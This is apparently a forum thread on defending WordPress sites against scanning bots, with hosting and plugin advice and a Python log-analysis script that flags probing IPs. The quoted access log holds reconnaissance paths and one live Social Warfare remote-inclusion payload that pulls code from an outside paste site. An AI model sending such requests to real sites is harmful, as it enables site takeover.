Hi there, I manage a bunch of WordPress sites, mostly on Cloudways. I regularly find my CPU has been stuck near 100%, and whenever I am able to figure out which application is the cause (not easy on Cloudways unless the attack is happening right now, then you can use Application Wise) it’s usually some foreign IP hitting all sorts of random URLs. I’m behind Cloudflare, but it doesn’t usually stop it and I have to go manually block the IP once I discover what it is. I’m getting really fed up with this as it regularly brings down my client websites, and it seems that this kind of traffic should be detectable and easily blocked by some kind of service or plugin. Any recommendations to protect against this?
Examples of the kind of traffic hitting random addresses, clearly looking for something to exploit:
[51.79.142.56] - - [01/Feb/2023:05:31:50 +0000] "GET /wp-content/plugins/iwp-client/readme.txt HTTP/1.1" 404 78848 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
[51.79.142.56] - - [01/Feb/2023:05:31:53 +0000] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://hastebin.com/raw/etonipusij HTTP/1.1" 200 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
[51.79.142.56] - - [01/Feb/2023:05:31:55 +0000] "GET /wp-admin/vuln.php HTTP/1.1" 404 78868 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
[51.79.142.56] - - [01/Feb/2023:05:31:57 +0000] "GET /wp-admin/vuln.htm HTTP/1.1" 404 78868 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
[51.79.142.56] - - [01/Feb/2023:05:32:20 +0000] "GET /adminer.php HTTP/1.1" 404 78908 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
[51.79.142.56] - - [01/Feb/2023:05:32:20 +0000] "GET /wp-admin/mysql-adminer.php HTTP/1.1" 404 78886 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
[51.79.142.56] - - [01/Feb/2023:05:32:21 +0000] "GET /wp-admin/adminer.php HTTP/1.1" 404 78874 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
[51.79.142.56] - - [01/Feb/2023:05:32:22 +0000] "GET /mysql-adminer.php HTTP/1.1" 404 78914 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
[51.79.142.56] - - [01/Feb/2023:05:32:23 +0000] "GET /adminer/adminer.php HTTP/1.1" 404 78867 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
[51.79.142.56] - - [01/Feb/2023:05:32:24 +0000] "GET /upload/adminer.php HTTP/1.1" 404 78874 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
[51.79.142.56] - - [01/Feb/2023:05:32:25 +0000] "GET /adminer/adminer-4.7.0.php HTTP/1.1" 404 78886 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
[51.79.142.56] - - [01/Feb/2023:05:32:25 +0000] "GET /wp-content/adminer.php HTTP/1.1" 404 78867 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
[51.79.142.56] - - [01/Feb/2023:05:32:27 +0000] "GET /wp-content/uploads/adminer.php HTTP/1.1" 403 451 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
[51.79.142.56] - - [01/Feb/2023:05:32:26 +0000] "GET /uploads/adminer.php HTTP/1.1" 404 78874 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
[51.79.142.56] - - [01/Feb/2023:05:32:28 +0000] "GET /adminer/ HTTP/1.1" 404 78899 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
[51.79.142.56] - - [01/Feb/2023:05:32:28 +0000] "GET /_adminer.php HTTP/1.1" 404 78902 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
[51.79.142.56] - - [01/Feb/2023:05:32:29 +0000] "GET /mirasvit_adminer_mysql.php HTTP/1.1" 404 78923 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0"
Install Wordfence and check its log to see where the hits are coming from i.e. what country.
Then set up these rules in your CF WAF: https://gridpane.com/blog/cloudflare-firewall-rules-for-securing-wordpress-websites/. I usually set up a rule to block all of the “problem” countries (which you can ascertain from Wordfence), and Managed Challenge countries that might be problematic but you still need traffic from.
That will stop 95% of junk traffic that you don’t need.
Use ReCaptcha on wp-admin. Disable xmlrpc, especially if you don’t need it. Turn on auto bans for failed password login attempts and non-existing usernames in Wordfence. Turn on auto-updates for all plugins. Double check all your Cloudflare and Wordfence settings. Make sure you are running the current version of PHP. Check for security settings within Cloudways. Make sure Cloudways is installing all your newest server security patches.
We use the CleanTalk plugin. I am not sure if it would block these, as I most likely have other bots knocking than you, but it seems to work fine for us.
Wordfence and CleanTalk. I install both on every site. When a website is “mission critical” I upgrade to the paid Wordfence. This has worked for my sites so far. I’ll still occasionally get a burst of this sort, but Wordfence blocks it pretty quick. I’ll see it in the logs.
Make sure you have the Wordfence firewall running.
Also look into blocking some of that traffic at the server level if you have access and SSH. It’s better to stop undesired traffic before it gets to your sites.
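For the server-level approach suggested above, here is an added example (not from anyone in this thread) of the detection logic a small cron job could run over the access log: it parses the log shape shown in the question and flags any IP that probes several distinct non-existent paths inside a short window, which is exactly what the Adminer/vuln.php scan looks like and what a normal visitor never does. The log regex, thresholds and sample lines are assumptions; point the output at whatever you actually use to block (fail2ban, the host firewall, a Cloudflare IP list).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches the log shape in the question: [ip] - - [ts] "REQ" status ... (assumed; adjust to your host's format).
LOG_RE = re.compile(r'^\[(?P<ip>[^\]]+)\] - - \[(?P<ts>[^\]]+)\] '
                    r'"\S+ (?P<path>\S+)[^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return (ip, timestamp, path without query string, status), or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return (m["ip"], datetime.strptime(m["ts"], TS_FMT),
            m["path"].split("?", 1)[0], int(m["status"]))

def find_scanners(lines, window=timedelta(seconds=60), min_misses=5):
    """Flag IPs that hit >= min_misses distinct missing/forbidden paths within one sliding
    window; a scanner walking a wordlist of plugin/admin paths does, visitors don't."""
    misses = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[3] in (403, 404):   # the scan in the question drew both codes
            misses[rec[0]].append((rec[1], rec[2]))
    flagged = {}
    for ip, hits in misses.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            paths = {p for t, p in hits[i:] if t - start <= window}
            if len(paths) >= min_misses:
                flagged[ip] = sorted(paths)   # {ip: distinct probed paths}
                break
    return flagged

# Constructed sample log (RFC 5737 documentation addresses, not real hosts):
# 203.0.113.7 probes admin/DB tooling paths, 192.0.2.10 is an ordinary visitor.
SAMPLE = [
    '[203.0.113.7] - - [01/Feb/2023:05:32:20 +0000] "GET /adminer.php HTTP/1.1" 404 78908 "-" "Mozilla/5.0"',
    '[203.0.113.7] - - [01/Feb/2023:05:32:21 +0000] "GET /wp-admin/adminer.php HTTP/1.1" 404 78874 "-" "Mozilla/5.0"',
    '[192.0.2.10] - - [01/Feb/2023:05:32:21 +0000] "GET /blog/hello-world/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '[203.0.113.7] - - [01/Feb/2023:05:32:22 +0000] "GET /mysql-adminer.php HTTP/1.1" 404 78914 "-" "Mozilla/5.0"',
    '[203.0.113.7] - - [01/Feb/2023:05:32:27 +0000] "GET /wp-content/uploads/adminer.php HTTP/1.1" 403 451 "-" "Mozilla/5.0"',
    '[192.0.2.10] - - [01/Feb/2023:05:32:30 +0000] "GET /old-page/ HTTP/1.1" 404 78900 "-" "Mozilla/5.0"',
    '[203.0.113.7] - - [01/Feb/2023:05:32:29 +0000] "GET /wp-admin/vuln.php?x=1 HTTP/1.1" 404 78868 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, paths in find_scanners(SAMPLE).items():
        print(f"block candidate {ip}: {len(paths)} distinct probes, e.g. {paths[0]}")
```

Tune `window` and `min_misses` against a week of your own logs first so that a visitor clicking through stale links never crosses the threshold.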